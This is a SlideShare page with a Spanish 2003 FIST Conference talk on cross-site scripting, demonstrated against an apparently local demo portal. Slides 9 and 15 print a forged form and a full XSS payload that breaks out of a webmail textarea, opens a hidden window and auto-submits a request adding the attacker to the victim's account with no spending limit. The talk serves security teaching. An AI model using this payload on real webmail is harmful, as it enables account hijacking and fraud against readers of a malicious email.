SlideShare una empresa de Scribd logo
FIST Conference October 2003 @




Cross-site scripting
   © Rafael San Miguel Carrasco
XSS

                  Portal exclusivo para clientes de SMC:



                    webmail

                    grupos de usuarios (1 cuenta, múltiples usuarios)

                    compra de entradas, discos, libros, videojuegos, etc.




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com     2
XSS

                  Autenticación:

                  Basada en login/password, al inicio de cada sesión.
                  En adelante, una cookie que se utiliza como credencial
                  para todos los recursos del portal.




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com        3
XSS

                  2 vulnerabilidades:


                       el webmail es vulnerable a XSS (al leer un mensaje
                        con contenido malicioso)
                    es posible automatizar el proceso de inclusión de un
                        nuevo usuario a nuestra cuenta




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com       4
XSS

                  Añadir a un usuario a mi lista:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   5
XSS




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   6
XSS




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   7
XSS
                  HTML form en datosusuario.php:
                  (qué se envía a confirma.php)
                    echo "<form action=confirma.php method=post>";
                    echo "<p>Su nombre: <b>Rafael San Miguel Carrasco</b><br>";
                    echo "<input type=hidden name=nombre value=Rafael San Miguel>";
                    echo "Usuario que desea añadir: <b>$duser</b><br>";
                    echo "<input type=hidden name=nuevo value='$duser'>";
                    echo "Cuenta asociada a la línea: <b>91 466 56 89</b></p>";
                    echo "<input type=hidden name=linea value=91 466 56 89>";
                    <p>Limite de consumo:
                    <select name="limite">
                    <option value="">Seleccione una cantidad
                    <option value="100">100 euros
                    <option value="200">200 euros
                    <option value="500">500 euros
                    <option value="0">Sin límite
                    </select><p>
© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com            8
XSS

                  Utilizando form reloading:

                     <form action=http://127.0.0.1/confirma.php method=post>
                     <input type=hidden name=nombre value=Rafael San Miguel Carrasco>
                     <input type=hidden name=nuevo value='Julia Villanueva'>
                     <input type=hidden name=linea value=91 466 56 89>
                     <input type=hidden name=limite value=0>
                     <input type=submit value=enviar>
                     </form>


                   Luego es posible reducir los tres pasos de
                   procedimiento original a un solo paso.


© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com            9
XSS
                  Comprobamos que es vulnerable a XSS:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   10
XSS

                  Inicialmente, parece que no:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   11
XSS

                  Cerramos </textarea>, ahora sí:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   12
XSS

                  Insertamos el form anterior, con algunos
                  cambios:


                    el código se carga en otra ventana

                    el envío del formulario es automático

                    se intenta ocultar la ventana (dimensión mínima,
                        localización más alla de los límites de la pantalla




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com             13
XSS

                  Por lo tanto:

                  1.    El usuario víctima recibe el e-mail
                  2.    Al abrirlo, se ejecuta el código del formulario en otra
                        ventana, sin que éste lo advierta
                  3.    El envío del formulario supone mi inclusión en la lista de
                        usuarios de la víctima




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com             14
XSS

                      Éste es el formulario modificado:
                   
                  </textarea><script>v = window.open (<parametros de localizacion y tamaño>);
                  v.document.write ('<body><form name=f action=http://127.0.0.1/confirma.php
                  method=post>');
                  v.document.write ('<input type=hidden name=nombre value=víctima>');
                  v.document.write ('<input type=hidden name=nuevo value=nuestro nombre>');
                  v.document.write ('<input type=hidden name=linea value=teléfono de la víctima>');
                  v.document.write ('<input type=hidden name=limite value=0>');
                  v.document.write ('<img src=bla.jpg onError=document.f.submit ()></form>
                  </body>');
                  v.close ();
                  </script>




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com                     15
Herramientas de detección
                  de vulnerabilidades



                     <script> function openBrWindow(theURL,winName,features) {
                     window.open(theURL,winName,features); } </script>

                     <a href="#" onClick="openBrWindow('bla.html','','');"> <img
                     src="bla.jpg"></a>




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com            16
Cross-site scripting
FIST Conference October 2003
© Rafael San Miguel Carrasco
Madrid, 25 October 2003

Más contenido relacionado

Similar a Exploiting Web Applications XSS

Exploiting Web applications SQL Injection
Exploiting Web applications SQL InjectionExploiting Web applications SQL Injection
Exploiting Web applications SQL Injection
Conferencias FIST
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
guestbfa74a
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
Securinf.com Seguridad Informatica - Tecnoweb2.com
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
Jose Mato
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
kernelinux
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
Oscar Javier Gentilezza Arenas
 
Esquemas de seguridad para el servidor
Esquemas de seguridad para el servidorEsquemas de seguridad para el servidor
Esquemas de seguridad para el servidor
Alberto Arredondo Infante
 
Codigos para html
Codigos para htmlCodigos para html
Codigos para html
Guillermo Ce
 
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaMitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Software Guru
 
Samm owasp
Samm owaspSamm owasp
Samm owasp
Software Guru
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
Alan Resendiz
 
Encriptación parte 1
Encriptación parte 1Encriptación parte 1
Encriptación parte 1
Mian Rosales
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
Facultad de Ciencias y Sistemas
 
Ejemnplos java nuevos
Ejemnplos java nuevosEjemnplos java nuevos
Ejemnplos java nuevos
Stiven Valencia Ramirez
 
Xss attacks
Xss attacksXss attacks
Xss attacks
Rober Garamo
 

Similar a Exploiting Web Applications XSS (15)

Exploiting Web applications SQL Injection
Exploiting Web applications SQL InjectionExploiting Web applications SQL Injection
Exploiting Web applications SQL Injection
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 
Esquemas de seguridad para el servidor
Esquemas de seguridad para el servidorEsquemas de seguridad para el servidor
Esquemas de seguridad para el servidor
 
Codigos para html
Codigos para htmlCodigos para html
Codigos para html
 
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaMitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
 
Samm owasp
Samm owaspSamm owasp
Samm owasp
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
 
Encriptación parte 1
Encriptación parte 1Encriptación parte 1
Encriptación parte 1
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
 
Ejemnplos java nuevos
Ejemnplos java nuevosEjemnplos java nuevos
Ejemnplos java nuevos
 
Xss attacks
Xss attacksXss attacks
Xss attacks
 

Más de Conferencias FIST

Seguridad en Open Solaris
Seguridad en Open SolarisSeguridad en Open Solaris
Seguridad en Open Solaris
Conferencias FIST
 
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
Conferencias FIST
 
Spanish Honeynet Project
Spanish Honeynet ProjectSpanish Honeynet Project
Spanish Honeynet Project
Conferencias FIST
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
Conferencias FIST
 
SAP Security
SAP SecuritySAP Security
SAP Security
Conferencias FIST
 
Que es Seguridad
Que es SeguridadQue es Seguridad
Que es Seguridad
Conferencias FIST
 
Network Access Protection
Network Access ProtectionNetwork Access Protection
Network Access Protection
Conferencias FIST
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
Conferencias FIST
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
Conferencias FIST
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security Forum
Conferencias FIST
 
Criptografia Cuántica
Criptografia CuánticaCriptografia Cuántica
Criptografia Cuántica
Conferencias FIST
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes Wireless
Conferencias FIST
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la Concienciación
Conferencias FIST
 
Security Metrics
Security MetricsSecurity Metrics
Security Metrics
Conferencias FIST
 
PKI Interoperability
PKI InteroperabilityPKI Interoperability
PKI Interoperability
Conferencias FIST
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
Conferencias FIST
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
Conferencias FIST
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
Conferencias FIST
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseConferencias FIST
 
Security Maturity Model
Security Maturity ModelSecurity Maturity Model
Security Maturity Model
Conferencias FIST
 

Más de Conferencias FIST (20)

Seguridad en Open Solaris
Seguridad en Open SolarisSeguridad en Open Solaris
Seguridad en Open Solaris
 
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
 
Spanish Honeynet Project
Spanish Honeynet ProjectSpanish Honeynet Project
Spanish Honeynet Project
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
 
SAP Security
SAP SecuritySAP Security
SAP Security
 
Que es Seguridad
Que es SeguridadQue es Seguridad
Que es Seguridad
 
Network Access Protection
Network Access ProtectionNetwork Access Protection
Network Access Protection
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security Forum
 
Criptografia Cuántica
Criptografia CuánticaCriptografia Cuántica
Criptografia Cuántica
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes Wireless
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la Concienciación
 
Security Metrics
Security MetricsSecurity Metrics
Security Metrics
 
PKI Interoperability
PKI InteroperabilityPKI Interoperability
PKI Interoperability
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
 
Security Maturity Model
Security Maturity ModelSecurity Maturity Model
Security Maturity Model
 

Último

Manual de Soporte y mantenimiento de equipo de cómputos
Manual de Soporte y mantenimiento de equipo de cómputosManual de Soporte y mantenimiento de equipo de cómputos
Manual de Soporte y mantenimiento de equipo de cómputos
cbtechchihuahua
 
Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....
Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....
Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....
MiguelAtencio10
 
El uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptxEl uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptx
jgvanessa23
 
MONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIA
MONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIAMONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIA
MONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIA
leia ereni
 
INFORMATICA Y TECNOLOGIA
INFORMATICA Y TECNOLOGIAINFORMATICA Y TECNOLOGIA
INFORMATICA Y TECNOLOGIA
renzocruz180310
 
Flows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos FeaturesFlows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos Features
Paola De la Torre
 
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdfPresentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
giampierdiaz5
 
Nuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsadNuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsad
larapalaciosmonzon28
 
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdfPLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
70244530
 
La Inteligencia Artificial en la actualidad.docx
La Inteligencia Artificial en la actualidad.docxLa Inteligencia Artificial en la actualidad.docx
La Inteligencia Artificial en la actualidad.docx
luiscohailatenazoa0
 
Manual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputoManual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputo
doctorsoluciones34
 
mantenimiento de chasis y carroceria1.pptx
mantenimiento de chasis y carroceria1.pptxmantenimiento de chasis y carroceria1.pptx
mantenimiento de chasis y carroceria1.pptx
MiguelAtencio10
 
Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...
Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...
Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...
AMADO SALVADOR
 
625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf
yuberpalma
 
computacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADOcomputacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADO
YaniEscobar2
 
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
codesiret
 
Presentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre bloggerPresentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre blogger
larapalaciosmonzon28
 
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANOREVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
gisellearanguren1
 
Modo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdfModo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdf
ranierglez
 
El uso de las TIC por Cecilia Pozos S..pptx
El uso de las TIC  por Cecilia Pozos S..pptxEl uso de las TIC  por Cecilia Pozos S..pptx
El uso de las TIC por Cecilia Pozos S..pptx
cecypozos703
 

Último (20)

Manual de Soporte y mantenimiento de equipo de cómputos
Manual de Soporte y mantenimiento de equipo de cómputosManual de Soporte y mantenimiento de equipo de cómputos
Manual de Soporte y mantenimiento de equipo de cómputos
 
Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....
Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....
Mantenimiento de sistemas eléctricos y electrónicosarticles-241712_recurso_6....
 
El uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptxEl uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptx
 
MONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIA
MONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIAMONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIA
MONOGRAFIA memoria RAM.docx trabajo DE TECNOLOGIA
 
INFORMATICA Y TECNOLOGIA
INFORMATICA Y TECNOLOGIAINFORMATICA Y TECNOLOGIA
INFORMATICA Y TECNOLOGIA
 
Flows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos FeaturesFlows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos Features
 
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdfPresentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
 
Nuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsadNuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsad
 
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdfPLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
 
La Inteligencia Artificial en la actualidad.docx
La Inteligencia Artificial en la actualidad.docxLa Inteligencia Artificial en la actualidad.docx
La Inteligencia Artificial en la actualidad.docx
 
Manual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputoManual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputo
 
mantenimiento de chasis y carroceria1.pptx
mantenimiento de chasis y carroceria1.pptxmantenimiento de chasis y carroceria1.pptx
mantenimiento de chasis y carroceria1.pptx
 
Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...
Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...
Catalogo general tarifas 2024 Vaillant. Amado Salvador Distribuidor Oficial e...
 
625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf
 
computacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADOcomputacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADO
 
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
 
Presentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre bloggerPresentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre blogger
 
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANOREVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
 
Modo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdfModo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdf
 
El uso de las TIC por Cecilia Pozos S..pptx
El uso de las TIC  por Cecilia Pozos S..pptxEl uso de las TIC  por Cecilia Pozos S..pptx
El uso de las TIC por Cecilia Pozos S..pptx
 

Exploiting Web Applications XSS

  • 1. FIST Conference October 2003 @ Cross-site scripting © Rafael San Miguel Carrasco
  • 2. XSS Portal exclusivo para clientes de SMC:  webmail  grupos de usuarios (1 cuenta, múltiples usuarios)  compra de entradas, discos, libros, videojuegos, etc. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
  • 3. XSS Autenticación: Basada en login/password, al inicio de cada sesión. En adelante, una cookie que se utiliza como credencial para todos los recursos del portal. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
  • 4. XSS 2 vulnerabilidades:  el webmail es vulnerable a XSS (al leer un mensaje con contenido malicioso)  es posible automatizar el proceso de inclusión de un nuevo usuario a nuestra cuenta © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
  • 5. XSS Añadir a un usuario a mi lista: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
  • 6. XSS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 6
  • 7. XSS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 7
  • 8. XSS HTML form en datosusuario.php: (qué se envía a confirma.php) echo "<form action=confirma.php method=post>"; echo "<p>Su nombre: <b>Rafael San Miguel Carrasco</b><br>"; echo "<input type=hidden name=nombre value=Rafael San Miguel>"; echo "Usuario que desea añadir: <b>$duser</b><br>"; echo "<input type=hidden name=nuevo value='$duser'>"; echo "Cuenta asociada a la línea: <b>91 466 56 89</b></p>"; echo "<input type=hidden name=linea value=91 466 56 89>"; <p>Limite de consumo: <select name="limite"> <option value="">Seleccione una cantidad <option value="100">100 euros <option value="200">200 euros <option value="500">500 euros <option value="0">Sin límite </select><p> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
  • 9. XSS Utilizando form reloading: <form action=http://127.0.0.1/confirma.php method=post> <input type=hidden name=nombre value=Rafael San Miguel Carrasco> <input type=hidden name=nuevo value='Julia Villanueva'> <input type=hidden name=linea value=91 466 56 89> <input type=hidden name=limite value=0> <input type=submit value=enviar> </form> Luego es posible reducir los tres pasos de procedimiento original a un solo paso. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 9
  • 10. XSS Comprobamos que es vulnerable a XSS: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 10
  • 11. XSS Inicialmente, parece que no: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 11
  • 12. XSS Cerramos </textarea>, ahora sí: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 12
  • 13. XSS Insertamos el form anterior, con algunos cambios:  el código se carga en otra ventana  el envío del formulario es automático  se intenta ocultar la ventana (dimensión mínima, localización más alla de los límites de la pantalla © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 13
  • 14. XSS Por lo tanto: 1. El usuario víctima recibe el e-mail 2. Al abrirlo, se ejecuta el código del formulario en otra ventana, sin que éste lo advierta 3. El envío del formulario supone mi inclusión en la lista de usuarios de la víctima © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 14
  • 15. XSS Éste es el formulario modificado:   </textarea><script>v = window.open (<parametros de localizacion y tamaño>); v.document.write ('<body><form name=f action=http://127.0.0.1/confirma.php method=post>'); v.document.write ('<input type=hidden name=nombre value=víctima>'); v.document.write ('<input type=hidden name=nuevo value=nuestro nombre>'); v.document.write ('<input type=hidden name=linea value=teléfono de la víctima>'); v.document.write ('<input type=hidden name=limite value=0>'); v.document.write ('<img src=bla.jpg onError=document.f.submit ()></form> </body>'); v.close (); </script> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 15
  • 16. Herramientas de detección de vulnerabilidades <script> function openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } </script> <a href="#" onClick="openBrWindow('bla.html','','');"> <img src="bla.jpg"></a> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 16
  • 17. Cross-site scripting FIST Conference October 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003

Notas del editor

  1. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  2. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  3. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  4. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  5. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  6. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  7. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  8. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  9. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  10. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  11. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  12. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  13. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.